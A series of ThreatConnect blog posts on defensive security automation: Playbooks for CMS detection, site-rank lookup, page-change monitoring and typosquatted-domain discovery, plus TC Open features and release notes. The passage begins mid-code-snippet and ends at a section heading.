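# NOTE: endpoint and response shape are assumptions for illustration;
# consult the WhatCMS API documentation for the current contract.
API_URL = 'https://whatcms.org/APIEndpoint/Detect'

def build_request_url(api_key, site_url):
    """Build the detection request URL for a given site."""
    query = urllib.parse.urlencode({'key': api_key, 'url': site_url})
    return f'{API_URL}?{query}'

def extract_cms(response_json):
    """Pull the CMS name out of a (hypothetical) WhatCMS response.

    Returns None when detection was unsuccessful, mirroring how the
    Playbook only tags the indicator on a successful result.
    """
    result = response_json.get('result', {})
    if result.get('code') == 200 and result.get('name'):
        return result['name']
    return None

def fetch_cms(api_key, site_url):
    """Call the API and return the detected CMS name (or None)."""
    with urllib.request.urlopen(build_request_url(api_key, site_url)) as resp:
        return extract_cms(json.load(resp))

# Canned response standing in for a live API call:
canned = {'result': {'code': 200, 'name': 'WordPress', 'version': '5.2'}}
print(extract_cms(canned))  # WordPress
```

The Playbook then writes the returned name into a tag and an attribute on the indicator, which is the enrichment you see after clicking "Detect CMS".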

Installing the Playbook

To install the playbook, download WhatCMS_ Detect CMS of Website.pbx from our GitHub repository ( Then import it into ThreatConnect from the "Playbooks" page. When importing the app, you will be asked to provide your WhatCMS API key (for which you can register here). This will be stored in ThreatConnect as a Keychain variable and can be used in other ThreatConnect apps and playbooks (you can read more about variables in section 5 here).

Once you have installed the playbook, it would be helpful to walk through the playbook as done in the video below, so you can get an idea of what the playbook does.

The post Playbook Fridays: WhatCMS API Playbook appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: OneMillion API Component

Using this Playbook Component, incident responders and analysts can check if a given domain exists on any lists of the most frequently visited hostnames

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.


This week, we are featuring a Playbook Component which finds the rank of a given host in a list of the one million most-visited hostnames. In this post, we are going to introduce why this component is useful, discuss why it is a Playbook Component rather than a Playbook, and show you how to use this component (if you have Playbooks enabled in your ThreatConnect instance, you can create a Playbook to use this component in less than five minutes).


If a Host Indicator is one of the top million most-visited domains, this usually merits further investigation. It could be that a host in the list is benign (perhaps it is a false positive, or perhaps a malware sample calls back to a benign host to test its internet connection or get its IP address). It could alternatively mean that the host is malicious and simply getting a lot of traffic. Either way, it's helpful to have this information. This Playbook Component, built on the OneMillion API (which is not maintained by ThreatConnect), allows incident responders and analysts to check if a given domain exists on any lists of the most frequently visited hostnames.
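To see what the component's lookup boils down to, the same check can be run against a local copy of a top-one-million list (several providers publish these as `rank,domain` CSVs). A minimal sketch, with the sample rows standing in for a downloaded file:

```python
import csv

def load_ranks(lines):
    """Parse 'rank,domain' rows (the CSV format such lists are published in)."""
    ranks = {}
    for rank, domain in csv.reader(lines):
        ranks[domain] = int(rank)
    return ranks

def host_rank(ranks, host):
    """Return the host's rank, or None if it is outside the top one million."""
    return ranks.get(host.lower())

# In practice the lines would come from the downloaded top-1M CSV file:
ranks = load_ranks(['1,google.com', '2,youtube.com', '3,facebook.com'])
print(host_rank(ranks, 'youtube.com'))  # 2
```

A `None` result is the interesting signal either way: the host is not widely visited, which changes how you weigh it during triage.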

Why a component?

Before we talk about how to use this component, let's address why this system was created as a Playbook Component rather than a normal Playbook. The major benefit of components is that you can capture a common process you would like to repeat in multiple, diverse places. For example, if you are making a Playbook which requires you to get the length of a string, you could add apps to get the length of a string to that Playbook, but if you ever need to get the length of a string again, you will have to recreate what you have already done. Instead, if you are creating a generic function or one that you would like to use in multiple playbooks, consider creating a component. A component lets you perform an operation again and again without having to recreate anything (and by the way, there is a component to get the length of a string described here (this site is not maintained by ThreatConnect)). In the case of the OneMillion API Component, it was created as a component so that it is easy to plug into new and existing playbooks.

Using the component

So how do you use this component? In this section, we'll walk through the installation of the component and will create a Playbook to use the component to show you how easy it is to use components to expand the functionality of a Playbook.

  1. The first step is to install the component. You can download it from (which is not maintained by ThreatConnect) or download the "Query OneMillion API.pbx" file from GitHub.
  2. Once you have downloaded the component, you can import it into ThreatConnect like a Playbook by going to the "Playbooks" tab in ThreatConnect and clicking "New" > "Import" (on ThreatConnect versions before 5.7, you can click the "Import" button). Then import the Query OneMillion API.pbx file.
  3. Turn it on and the component is ready to be used!
  4. Now that we have installed and activated the "Query OneMillion API" component, we need to create a Playbook to use it. To do this, go back to the "Playbooks" tab in ThreatConnect and create a new Playbook. For this example, we are going to create a Playbook with a User Action trigger that will allow users to submit a host indicator in ThreatConnect to the OneMillion API and return the result with a single click.
  5. To build this Playbook, select the "Trigger" tab in the pane on the left and select "UserAction". This will add the trigger to the design canvas. Now, double click on the new trigger to edit it. Rename the trigger in the "User Action Name" field (this name will show up for users when viewing Host indicators in ThreatConnect). Select "Host" for the "Type" field, click through the next section, and save the trigger.
  6. Now, click the "App" tab in the pane on the left and select "Query OneMillion API" from the "Components" section. If it does not show up, this is probably because the "Query OneMillion API" component you installed in step two is not turned on (as we did in step three). Assuming you were able to find the "Query OneMillion API" component and add it to the design canvas, drag a line from the blue dot on the trigger to the component. Double click on the component to edit it. In the "Host" field, start typing "#" and a list of available options will show up. Select "trg.action.item" (this is the hostname which is captured by the User Action trigger); this means that the hostname from which the Playbook was triggered will be sent to the OneMillion API (if this doesn't make sense, watch the gif above for a demo that will clarify how this system works). Save the "Query OneMillion API" component.
  7. Now, draw a line between the blue dot on the "Query OneMillion API" component and the trigger. This allows us to send information back to the user via the trigger. Double click on the trigger to edit it. Click "Next" to move to the second stage (you should see a text area with the label "Body"). In the text area, start typing "#" (again, this shows you a list of available values you can send back to the user). Select "hostRank" and save the trigger.
  8. Turn the Playbook on by clicking the "Active" toggle in the upper right-hand corner.
  9. Now for the fun part: using the Playbook! Find or create a host indicator in your ThreatConnect instance. There should be a "Playbook Actions" card on the top-right side of the indicator's page and it should list the name of the User Action trigger you provided in step five (if you didn't change the name of the User Action trigger, it will probably show up as "UserAction Trigger 1"). When you click it, the Playbook will be executed and the rank of the host (if there is one) will be returned to the right of the trigger. You now have a Playbook which lets analysts query the OneMillion API!

If you have completed the steps above and would like to contribute your playbook with the trigger in it, there are instructions for contributing to our playbooks repository here: .

If you have any questions or run into any problems with this playbook component, please raise an issue in Github. As always, let us know if you have any questions!






The post Playbook Fridays: OneMillion API Component appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

ThreatConnect’s RSA Archer Integration, Playbooks, and Apps (oh my!)

One of our top integration requests has been Playbooks for RSA Archer. Good News: we now have numerous out-of-the-box integration capabilities for connecting RSA Archer and ThreatConnect! These apps and Playbook templates allow you to perform a variety of use cases with Archer, from saving users time by automatically assigning relevant threat intelligence to cases, to instantly creating records in Archer tied to incidents in ThreatConnect.

With ThreatConnect and Archer, you can:

  • Leverage over 100 other ThreatConnect integrations to enrich information in Archer
  • Automate processes across the Archer and ThreatConnect platforms to save your team time and make them more efficient
  • Allow for easier collaboration and sharing of intelligence and information between teams and platforms

Below, you'll find an overview of the Apps and Templates available directly from ThreatConnect:


  • Get RSA Archer Record: This app retrieves an RSA Archer record. It's really important to look over the Import Archer Record Playbook if you're going to use the Get Archer Record app, as it details how to utilize the complicated Archer JSON structure within a Playbook.
  • Create RSA Archer Record: This app creates an RSA Archer record. Supported field types are Text, Numeric, Date, Values List, Attachment, IP Address, and User Lists.
  • Update RSA Archer Record: This app updates an existing RSA Archer record. Supported field types are Text, Numeric, Date, Values List, Attachment, IP Address, and User Lists.


RSA Archer | Import Archer Record

This Playbook starts with an HTTP Trigger which is intended to be triggered by an Archer advanced workflow. Once triggered, the Playbook will download and parse the Archer record with the ID that was passed to it. From there it will create a ThreatConnect Incident and save the appropriate parsed fields in the Incident. Additionally, it will parse the Actor saved on the Archer record and either save it or associate it with the Incident in ThreatConnect. Lastly, the Archer record is updated with a link back to the Incident in ThreatConnect.


RSA Archer | Create Archer Record from Incident

This Playbook starts with a User Action trigger tied to ThreatConnect Incidents. When triggered, it will parse the Incident attributes and create an Archer record with the relevant fields.


Want to learn more about ThreatConnect? Join us for a quick 30-minute bi-weekly walkthrough of the ThreatConnect Platform. This is a live demo with one of our security engineers who will be happy to answer any questions about how ThreatConnect will fit into your current security program.

The post ThreatConnect's RSA Archer Integration, Playbooks, and Apps (oh my!) appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: Web Page Monitoring

Monitor a website's content and get alerts if it changes

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

Monitoring websites for changes in content is an important procedure for both offensive and defensive teams. This Playbook simplifies that process: it monitors a website's content and alerts you when it changes. At the outset, we need to be clear that this Playbook is NOT designed to monitor malicious websites. Please do not use it for that purpose!

The mechanics of the Playbook are pretty simple. It contains a timer trigger, which means the Playbook can be executed on a desired interval (daily, weekly, or monthly). When the Playbook runs, it requests the website's content, computes the hash of that content, and compares the hash against the previous hash in the datastore. If the hash is different on one of the Playbook executions, it will send a Slack message to the given channel (although you can modify this to get notified however you prefer). As the Playbook is currently designed, if the website's contents have not changed, no notification will be sent.
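Stripped of the Playbook plumbing, the change-detection logic is just a hash comparison. A minimal sketch, with the datastore replaced by a value the caller persists between runs:

```python
import hashlib

def content_hash(page_bytes):
    """Fingerprint the page content so only a short hash needs storing."""
    return hashlib.sha256(page_bytes).hexdigest()

def check_for_change(page_bytes, previous_hash):
    """Compare the current content hash against the previously stored one.

    Returns (changed, new_hash); the caller persists new_hash for the next
    run and sends a notification only when changed is True.
    """
    current = content_hash(page_bytes)
    return current != previous_hash, current

changed, stored = check_for_change(b'<html>v1</html>', previous_hash=None)
print(changed)  # True: the first run has no stored hash to match
```

Hashing the whole page means any change triggers an alert, including trivial ones (rotating ads, timestamps), which is why you may want to hash only the portion of the page you care about.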


Getting Started

  1. Download the appropriate version for your instance of ThreatConnect. If you are running ThreatConnect version 5.6 or newer, you can use Page Monitor.pbx. If you are using an older version of ThreatConnect, you should use Page Monitor < 5.6.pbx.
  2. Go to the "Playbooks" tab in ThreatConnect and click "New" > "Import" (on ThreatConnect versions before 5.7, you can just click the "Import" button). Then import the page monitor Playbook file you downloaded in step 1. Now, we need to setup the Playbook.
  3. To set up the Playbook, find all of the apps with red error messages and fix the problems. For some of the apps, you may only need to open the app and re-save it.
  4. Once you are all setup, you can configure the timer trigger so that the Playbook runs when you would like it to run. From there, you're good to go! Again, please do NOT use this Playbook to monitor malicious infrastructure.


As always, if this Playbook does not fit your use-case exactly, feel free to redesign it and create the process you would like to see, or raise an issue describing your idea and one of the security developers from the community may be able to make the update for you. If you have any questions or run into any problems with this Playbook, please raise an issue in Github.













The post Playbook Fridays: Web Page Monitoring appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

10 Things Security Analysts Can Do for Free in TC Open

Find Relevant Intelligence and Stay "In the Know"

TC Open™ is the free edition of ThreatConnect. It gives you access to intelligence from many open sources (OSINT), all aggregated in one place under a unified framework.

One of the most valuable sources is our "Technical Blogs and Reports" source, which scans hundreds of popular threat intelligence and security blogs and makes them easily searchable and actionable in TC Open.

A sampling of some of the sources available in TC Open


See 10 things security analysts can do in TC Open:

  1. Search OSINT for intel on indicators, CVEs, and adversaries
  2. Check out the latest intel from your favorite security blogs
  3. Find Indicators related to a specific malware family or CVE
  4. Subscribe to your favorite intel topics
  5. Scan a text file to uncover relevant intel
  6. Download a PDF report and share it
  7. Export indicators for use in another tool or for further analysis
  8. Grab some Snort and YARA rules you can use immediately
  9. Create some daily or weekly habits using dashboards
  10. Explore and contribute to our Common Community


Search OSINT for intel on indicators, CVEs, and adversaries

Click the magnifying glass in the upper right of any page in ThreatConnect. Enter an indicator* of compromise, the name of an adversary, a malware family, a CVE, and more. Get results!

From here, click "Technical Blogs and Reports" to get some context on this indicator.


It's a scam!

Even if our free sources don't return results, we'll provide you links to dozens of popular enrichment sources so that your search doesn't have to end.


Click an Investigation Link to uncover more about an Indicator, or select "Open All" to view them all at once.

*Supported Indicators include IP Address, Host/Domain, URL, File Hash (MD5, SHA1, SHA256), Email Address, CIDR, ASN, User Agent, Mutex, and Registry Key.

Check out the latest intel from your favorite security blogs

Our Technical Blogs and Reports source (a/k/a "Tech Blogs") collects data from hundreds of popular security blogs and turns it into MRTI in ThreatConnect. To see what's new, select "Browse" from the main navigation menu, select "Technical Blogs and Reports" from the My ThreatConnect dropdown, then sort by date added.

Browse is a tabular view of all the intelligence you can access in ThreatConnect. Using the options on this page, you can filter on Indicators, Adversaries, Incidents, and more. The OSINT Dashboard (available from the "Dashboard" dropdown in the main menu) also shows the latest intel reports from Tech Blogs.


A sampling of some of the blogs we collect. You can request new ones by emailing


Find Indicators related to a specific malware family or CVE

Tags in ThreatConnect let us effectively categorize intel. Popular tags include specific CVEs, malware families, industry, and much more. You can filter the Browse screen by Tag by clicking the "Filters" button, entering a Tag (or Tags!) and clicking "Apply."


All Incidents tagged "coinhive."


You can also select the "Tags" option on the Browse screen to view a list of all Tags available to you, drill down on the Tag, and see all related intelligence.


Coinhive is a busy malware.


Subscribe to your favorite intel topics

If there's a Tag you're interested in, we'd recommend Following it so you can get notified whenever something new comes in. It's like subscribing to a topic across dozens of blogs instead of just following one blog. Just click the "Follow" option in the upper right when viewing the details of a particular Tag or other piece of intelligence.


Try it! Check out the [coinhive] Tag and click "Follow Item".

You can click on the Notification bell in the main navigation to adjust your notification preferences, e.g. instant email vs digest email.


Scan a text file to uncover relevant intel

Search lets you look for more than just one indicator or adversary or incident at a time: you can upload an entire file and have ThreatConnect scan it for indicators. For example, if you have a log file that's full of IP addresses (among other things), just save it as a text file; ThreatConnect will recognize the IPs and correlate them to known intelligence.
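In miniature, that kind of indicator recognition is pattern scanning. The sketch below (our own simplified illustration, not ThreatConnect's parser) pulls IPv4 addresses out of a blob of text:

```python
import re

IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

def extract_ipv4(text):
    """Return the unique IPv4-shaped strings found in a blob of text."""
    found = []
    for match in IPV4_RE.findall(text):
        # Cheap validity check: every octet must be 0-255.
        if all(int(octet) <= 255 for octet in match.split('.')):
            if match not in found:
                found.append(match)
    return found

log = 'Accepted connection from 10.0.0.5; blocked 203.0.113.77 twice (203.0.113.77)'
print(extract_ipv4(log))  # ['10.0.0.5', '203.0.113.77']
```

A real scanner also extracts hashes, domains, URLs, and email addresses, and then correlates each hit against known intelligence, which is what TC Open does with the uploaded file.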


Correlations between a log file and intelligence in ThreatConnect


Download a PDF report and share it

Indicators of Compromise are the atomic units of threat intelligence, and in ThreatConnect the "molecules" - the higher level objects like Adversary, Incident, Campaign, etc. - are called "Groups." You can find Groups by selecting the Groups option on the Browse screen. Once you've opened up a Group, you can download it as a PDF report. This can be shared with colleagues or retained for future use.

Export indicators for use in another tool or for further analysis

Any data you find on the Browse screen can be exported to a CSV. For example, you can take all of the Indicators related to a particular CVE and export them for blocking and analysis. Or you can take all Indicators (up to 5,000 at a time) tied to an Adversary and graph them in a dataviz tool like Tableau to show activity over time.


An adversary activity report we created in Tableau from data exported for free from ThreatConnect.


Grab some Snort and YARA rules you can use immediately

Most of the intelligence in the Tech Blogs source will have Snort or YARA rules/signatures associated with it. Grab one of these signatures to easily deploy intel to your EDR, network monitoring, or threat hunting tools.


This Incident can be acted on pretty quickly.


Create some daily or weekly habits using dashboards

TC Open users get access to four free dashboards, accessible from the Dashboard dropdown on the main nav. Each dashboard presents some interesting opportunities for creating some daily habits that can make you a better security professional. See this blog for more on the importance of habits in security. Here are just a few suggested habits you can get into using these dashboards:

  • My Dashboard - Once a week, take a look at some of the items in "My Recent History." How have they changed? Has any new intel been uncovered?
  • Operations Dashboard - Once a week, review the "Popular Tags" section. What's changed? Why are different things trending week to week?
  • OSINT Dashboard - Once a day, see what's new in Tech Blogs!


Explore and contribute to our Common Community

TC Open is not limited to just consuming intelligence - you can create your own! We believe that, like life, threat intelligence is best when shared. We've written a lot on sharing in our Common Community, but in a nutshell: you can add Indicators and Groups, tell a story around an Incident or an Adversary, and most importantly get additional context from other TC Open users. And of course, you can Browse what others are doing and collaborate with them!

The post 10 Things Security Analysts Can Do for Free in TC Open appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: Domain Spinning Workbench Spaces App

Gain insight into possible permutations of domain names to indicate suspicious activity and further analysis

For this week's Playbook Fridays post, we're mixing things up a little. Instead of directing you on how to set up a specific Playbook, we're going to help you take advantage of an App we built which is set up on top of preconfigured Playbooks.


In Star Wars: A New Hope, Luke, Han, and Chewie are faced with the daunting task of rescuing Leia from a holding cell in the Death Star. In comparison to the Death Star, their forces are minimal and their tech is limited to the door-opening capabilities of the valiant astromech droid R2-D2. Yes, C-3PO was there but you have to admit he was totally worthless and nearly led our heroes to a disgusting demise in the dianoga-laden disposal.

Despite being overmatched in terms of numbers and technology, Luke and Han are able to traverse multiple layers of security and exfiltrate the Princess by stealing armor and impersonating Stormtroopers. Enter the First Look Vulnerability, wherein an entire security function can be undermined by the immediate trust that we place in things that simply look familiar to us. Upon initial inspection by other Death Star personnel, Luke and Han look like all the other Stormtroopers, which is why their plan was ultimately successful. A more thorough inspection of them would have revealed neither possesses appropriate Stormtrooper knowledge and neither of their biometrics match those belonging to known troopers -- notably one of them was a little short. They also possess marksmanship skills far out of proportion to your average Stormtrooper.

This same paradigm plays out daily in the cyber security world. In comparison to their targets, malicious APT groups are often overmatched in terms of sheer numbers and the technology that they have at their disposal. Large organizations often have hundreds of individuals and millions of dollars in technology dedicated to cyber security whereas an APT may have three hackers and a paltry budget dedicated to compromising those same organizations. To facilitate their malicious efforts, APTs will often take the same approach as Luke and Han: exploit the First Look Vulnerability to gain insider access.

To exploit this vulnerability, bad guys leverage domains that spoof those belonging to their targets or organizations that their target would otherwise trust. In fact, spoofed domains were an essential part of many of the large-scale APT breaches from the past three years. Notably, Chinese APT actors leveraged such domains to breach healthcare and government organizations, ultimately compromising personal information for millions of individuals. Domains such as prennera[.]com and logitech-usa[.]com (Wekby report) initially appear to be legitimate, but in fact are not and can be leveraged in a range of malicious functions from delivery to command and control. Russian APT group Fancy Bear used multiple spoofed domains like misdepatrment[.]com, actblues[.]com, and wada-arna[.]org in operations targeting organizations like the DNC, DCCC, and WADA in 2016. Criminal groups like Carbanak also have used spoofed domains like baskin-robbin[.]com and buffalo-wildwings[.]com for cybercrime. However they are used, they are often successful because these domains exploit the implicit trust we have in the familiar.

The Domain Spinning Workbench

So what? Yeah, bad guys use sneaky domains, what can we do about it? Well, a lot, as it turns out. First and foremost, these domain squats have to be identified. There are a variety of tools, including DNStwist and URLCrazy, that can help an organization identify those domains that spoof or typosquat their own or the organizations that they most frequently work with.
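To illustrate the idea behind these tools, here is a minimal Python sketch of domain spinning. It is not the actual dnstwist or URLCrazy algorithm (real tools cover many more permutation classes, such as homoglyphs, bitsquatting, keyboard-adjacency typos, and TLD swaps); it simply generates omission, repetition, and transposition variants of a domain:

```python
def spin_domain(domain):
    """Yield simple typosquat variants of a domain: character omissions,
    character repetitions, and adjacent-character transpositions."""
    name, _, tld = domain.partition(".")
    variants = set()
    for i in range(len(name)):
        variants.add(name[:i] + name[i + 1:] + "." + tld)        # omission
        variants.add(name[:i] + name[i] + name[i:] + "." + tld)  # repetition
    for i in range(len(name) - 1):
        swapped = name[:i] + name[i + 1] + name[i] + name[i + 2:]
        variants.add(swapped + "." + tld)                         # transposition
    variants.discard(domain)  # drop variants identical to the original
    return sorted(variants)

if __name__ == "__main__":
    for v in spin_domain("threatconnect.com")[:5]:
        print(v)
```

Feeding the output of a generator like this into WHOIS and DNS lookups is essentially what the workbench automates.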

We've incorporated those tools into a set of apps and playbooks that can be used in ThreatConnect via our Domain Spinning Workbench. This workbench allows users to input a domain of interest and then returns all of the identified spoofed domains from one of the domain spinning tools, along with relevant WHOIS and DNS information, and then allows users to import any notable domains or registration email addresses into ThreatConnect for further research.

Configuring and Using the Workbench

To use the workbench, we'll start by configuring the Space App. Here in the configuration panel for the app, we can specify things like what Tag to apply to any imported domains or email addresses.

Further down in the configuration panel is where we can select which specific playbooks to use in the workbench. For example, for the Domain Spinning Playbook, we can choose DNSTwist, URLCrazy, Bitsquatting, or XNTwist. Depending on what type of spoofed domains we're looking for, we might change which playbook we use. We can also specify which playbook we want to use to conduct the WHOIS lookups for the identified domains.


After configuring the workbench, we can use it to spin an input domain. In our case, we're going to use our own domain to see what suspicious, ThreatConnect-spoofing domains show up.


Using the Results

As the app is running, the number of domains remaining to process is shown. During this time, the workbench is gathering results from several of the playbooks specified in the previous configuration panel. Notably, the spoofed domains are being identified and the WHOIS information for them is being pulled into the workbench.


After the playbooks have completed, the workbench returns the results. In this case, over 1,700 domains possibly spoofing ours are identified. These include both registered and unregistered domains; the registered domains show up first, followed by the unregistered domains, which are called out as not registered. The workbench also provides the WHOIS and DNS records for the original, provided domain to compare against the results. This can help identify the domains that your organization has already registered.
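The registered-versus-unregistered split can be approximated with a simple resolution check. The sketch below is illustrative, not the workbench's actual logic; a DNS answer is only a rough proxy for registration (parked or registered-but-unresolved domains need a WHOIS lookup), and the resolver is injectable so the function can be exercised offline:

```python
import socket

def split_registered(domains, resolve=None):
    """Partition candidate domains into (resolving, non-resolving) lists.

    `resolve` is a callable taking a domain and returning True/False;
    it defaults to a live DNS lookup but can be injected for testing.
    """
    if resolve is None:
        def resolve(d):
            try:
                socket.gethostbyname(d)
                return True
            except OSError:
                return False
    registered, unregistered = [], []
    for d in domains:
        (registered if resolve(d) else unregistered).append(d)
    return registered, unregistered
```

In practice the resolving list is the one to triage first, since those domains could already host mail or web content.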


When available, the workbench calls out the registrant email address and provides an option to import it into the ThreatConnect platform. For each identified domain there are also drop-down sections for the WHOIS and DNS data, which may help identify domains that stick out based on who registered them or where they are hosted.


When importing from the workbench, you can choose to specify the given domain and/or registrant email address as suspicious, potential, or malicious.


By importing the domains that we're concerned about into ThreatConnect, we can then use ThreatConnect's various investigative capabilities to build out our understanding of the domains, the activity associated with them, and the actor(s) behind them. Below, we're using our DomainTools Spaces App to further review the WHOIS information and identify other intelligence related to the dwbot@outlook[.]com registrant.


By clicking on the arrow next to the email address, we see that dwbot@outlook[.]com has registered about 1,200 domains, likely indicating a mass registrant. However, among the registered domains we find another domain notable to us, threatconnect[.]com[.]cn, as well as several hundred other spoofed domains. Based on such consistencies, an organization might then want to proactively monitor for new, potentially relevant domains registered by the identified registrant or actor.
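Pivoting on registrant email addresses, as described above, amounts to a simple group-and-count over WHOIS records. A hedged Python sketch (the records here are hypothetical stand-ins for the workbench's WHOIS lookups, not real data):

```python
from collections import Counter

# Hypothetical WHOIS records; in practice these would come from the
# workbench's WHOIS lookups rather than a hard-coded list.
whois_records = [
    {"domain": "threatconnect.com.cn", "registrant": "dwbot@outlook.com"},
    {"domain": "example-squat.com",    "registrant": "dwbot@outlook.com"},
    {"domain": "other.com",            "registrant": "someone@else.net"},
]

def domains_by_registrant(records):
    """Count how many candidate domains each registrant email registered."""
    return Counter(r["registrant"] for r in records)

counts = domains_by_registrant(whois_records)
print(counts.most_common(1))  # the most prolific registrant in the set
```

A registrant responsible for a disproportionate share of the spun domains is a natural candidate for ongoing monitoring.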



So What Can You Do With This Information?

Knowledge of a single registration targeting your organization is helpful, but identifying trends in these registrations over a period of time can potentially identify APT activity targeting your organization. From a strategic perspective, knowledge of these domain squats may inform higher level analysis of adversary motivations against the organization or even an industry. For example, with the information we acquired via the Workbench, we took a look at spoofed and typosquatted domain registrations from Chinese registrants targeting Blue Cross Blue Shield entities Anthem, CareFirst, Empire, Excellus, Premera, Wellmark, and Wellpoint in 2015. The graph below shows the number of those domains that were registered by month against each of the specific BCBS entities.


There are some pretty clear spikes in activity, three of which line up exactly with the public disclosure of breaches targeting those companies. More specifically, in these instances, registrants in China began registering the domains that caused the spike less than two days after the breaches were publicly announced. These registrations typically came from Chinese mass registrants and do not otherwise directly indicate malicious activity; however, this could be an indicator of Chinese APT activity attempting to rebuild its infrastructure for future efforts against those organizations after their previous attacks had been detected. Three of the other spikes didn't line up with any notable events, but in two of those cases all of the domains were registered by a single Chinese registrant.
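Spotting monthly registration spikes of this kind boils down to bucketing registration dates by month and flagging months above a threshold. A minimal sketch with made-up dates and an arbitrary threshold (real analysis would draw dates from WHOIS records and pick a statistically justified cutoff):

```python
from collections import Counter
from datetime import date

# Hypothetical registration dates; real data would come from WHOIS records.
registrations = [
    date(2015, 2, 5), date(2015, 2, 7), date(2015, 2, 9),  # spike month
    date(2015, 5, 1),
    date(2015, 9, 12),
]

def monthly_counts(dates):
    """Bucket registration dates into YYYY-MM counts."""
    return Counter(d.strftime("%Y-%m") for d in dates)

def spike_months(dates, threshold=2):
    """Flag months whose registration count meets or exceeds the threshold."""
    return [m for m, n in monthly_counts(dates).items() if n >= threshold]

print(spike_months(registrations))  # ['2015-02']
```

Correlating flagged months against a timeline of public events (such as breach disclosures) is then a manual analytic step.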

From a threat intelligence perspective, the presence or registration of such domains does not indicate that malicious activity has taken place. However, these registrations and the context associated with them should be further investigated, analyzed, and memorialized to ensure that the organization is properly defended against any potential threats that may be attempting to exploit the First Look Vulnerability. This is where having a threat intelligence platform, like ThreatConnect, becomes integral.

Leveraging ThreatConnect's Analyze function, we were able to quickly determine whether we had any additional intelligence on the BCBS spoofing domains or their associated WHOIS information. The results indicated that the email address yuming@yinsibaohu.aliyun[.]com, a mass registrant, was previously used to register domains used in the Chinese Scanbox framework and by Chinese APT TG-3390. However, this Yuming email address has registered over two million domains, making that connection an insufficient indicator of malicious activity.

From here, we imported the domains that were associated with the spikes identified above into an Incident in ThreatConnect. Investigating each of these domains using ThreatConnect's passive DNS capabilities, we identified two additional subdomains that were active during late 2015/early 2016, www.payment-ca.antyhem[.]com and e.xcellusbcbs[.]com. These subdomains clearly represent an attempt to target BCBS entities and potentially those individuals seeking to procure their services; however, no additional information was identified indicating that they hosted malicious files.

So while these registrations may not currently signify any specific malicious activity against BCBS, ThreatConnect's Track function can be used to keep tabs on the domains or registrants that stood out most from this analysis. This would ultimately alert the user whenever additional information becomes available on the domains or when the individual registers additional domains. ThreatConnect will also identify whenever the hosting information for domains included in our incident changes. This may help identify when a domain resolves to a new IP that is used in operations.


Leveraged on a daily basis, the Domain Spinning Workbench can help an organization identify spoofed domains as they are registered and before they are used in attacks. From a tactical perspective, how an organization deals with such domains once they are identified depends entirely on that organization and its own motivations. However, there are a variety of options for handling spoofed or typosquatted domains, including but not limited to: monitoring, blocking, sinkholing, takedowns, and purchasing. Each of these would ultimately have different implications for the organization, so it's important to consider such options thoroughly when operationalizing this intelligence.

Organizations should leverage all intelligence available to them to identify and defend against their highest priority threats. Getting back to our Star Wars reference, our heroes aren't in any danger until they are challenged on their knowledge of the Death Star. Had Empire personnel appropriately leveraged their technological advantage, biometric scanners or vocal comparison tests may have given them the intelligence necessary to challenge Luke and Han's First Look Vulnerability exploit and ultimately quash the Rebellion.

Get More Information

If this is something that interests you and you're a current ThreatConnect user, check out the article from our Knowledge Base that walks through all of these steps in greater detail. Click here to navigate to the ThreatConnect Knowledge Base.





The post Playbook Fridays: Domain Spinning Workbench Spaces App appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

ThreatConnect 5.7 Release Shows Advancements in Playbooks Capabilities

Juggling Priorities and Countless Orchestration Use Cases? We've Got Your Back

Automation and Orchestration are terms that are thrown around interchangeably and claimed to be supported by just about every product offering out there. The advancements in technology required to truly support scalable workflows should not be understated.

Remember those connect-the-dot games we used to love as kids? Simple, distinct, and only one way to proceed. That's a thing of the past. Organizations today have complex architectures to support business operations and keep assets secure. This requires things to happen quickly and seamlessly, passing information from one technology or team to another without confusion or delay. This can only happen in a fictional utopia, right? Wrong.

ThreatConnect users have been leveraging Playbooks to handle the automation of decision making for some time, but as the use cases requiring complex orchestration with multiple workflows increase, so must the engine driving the technology.

Orchestration is a game changer when it comes to decreasing mean time to detect (MTTD) and mean time to respond (MTTR), as well as allowing security analysts to step away from the tedious parts of their jobs and focus on strategic work. With the ThreatConnect 5.7 release, we've put significant improvements in place to support your endeavors.

Playbooks User Interface Improvements

Usability is a huge factor when it comes to increasing the adoption of technology (or anything, for that matter)! We've taken your feedback and implemented a couple of items to make using our Playbooks a much easier experience. This includes items like customized tagging and labels, the ability to add notes within Playbooks, an instant view of ROI metrics associated with individual Playbooks, and enhanced search and filter capabilities to ensure you can find what you want, when you want it.

A peek into our Playbooks interface!


A better user experience is never a bad thing. These improvements allow for:

  • Quicker navigation throughout Playbooks, with everything in one place
  • The ability to organize your Playbooks the way you want with customizable tags
    • Track the status or development of Playbooks with tags like "In Design" or "QA"
    • Tag Playbooks as "Enrichment", "Reporting", etc., to make filtering by Playbook type more manageable
  • Easy viewing, sorting, and filtering on Playbook name, the Trigger used, any labels you've applied, and status (Active vs. Inactive)
  • Notes that provide context as to why certain Playbooks were set up, allowing for clarification and better team collaboration
  • ROI data viewable without needing to drill down into the actual Playbook

Real-time Playbooks Activity Monitoring

Tying critical security operations to orchestration can be pretty nerve-racking initially. Having real-time insight into which Playbooks have run, are being run, and what's queued up is critical to understanding that things are working as intended. We've created a new Activity Dashboard which provides users with:

  • CPU Metrics
  • Memory Utilization Metrics
  • Counts of Top Playbooks Running
  • Duration of Playbooks Running
  • Most Popular Executed Apps
  • Playbooks Currently Running

Here's our updated activity dashboard where you can view multiple metrics from one view.


Real-time Playbooks Activity Monitoring gives users:

  • An instant status check to ensure things are running smoothly
  • Improved visibility and control over actively running Playbooks, making troubleshooting problematic Playbooks easier and actively managing them simpler
  • Quick checks for reporting on metrics like Top Executed Playbooks and Total Playbooks Executed

Addition of Playbooks Servers

